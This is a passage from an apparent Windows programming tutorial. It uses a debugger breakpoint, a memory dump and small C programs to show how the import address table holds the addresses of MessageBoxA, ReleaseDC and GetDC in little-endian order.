MessageBoxA on the machine and places that address at memory location 404094.
Thus it needs to do this only once
irrespective of the number of times the function is called. In the same vein,
memory location 404090 stores the address of the function ReleaseDC and 404098
that of GetDC.
To confirm this we add a breakpoint
interrupt in file d.c as follows.
d.c
#include <windows.h>
main()
{
__asm int 3
MessageBox(0,"hi","bye",0);
MessageBox(0,"hi1","bye1",0);
GetDC(0);
ReleaseDC(0,0);
}
Running the above program transports
us to the debugger. In the memory window, the memory location of 00404090 is
given. The bytes shown are as follows.
Memory
00404090 7A 3A E1 77
00404094 D5 75 E3 77
00404098 6C 3A E1 77
Now run the program f.c which has the following.
f.c
#include <windows.h>
#include <stdio.h>
main()
{
printf("ReleaseDC=%x\n",ReleaseDC);
printf("MessageBox=%x\n",MessageBox);
printf("GetDC=%x\n",GetDC);
}
ReleaseDC=77e13a7a
MessageBox=77e375d5
GetDC=77e13a6c
This program discloses the address of the ReleaseDC function as 77e13a7a. At
memory location 404090, the same value is stored but with the bytes in reverse
order, as the processor stores the least significant byte first. The import
table also shows the ReleaseDC function as its first member, and the
disassembly calls it through the same location. In the same vein, the address
of the MessageBoxA function is 77e375d5 and it is found at location 404094.
Ditto for GetDC at 404098.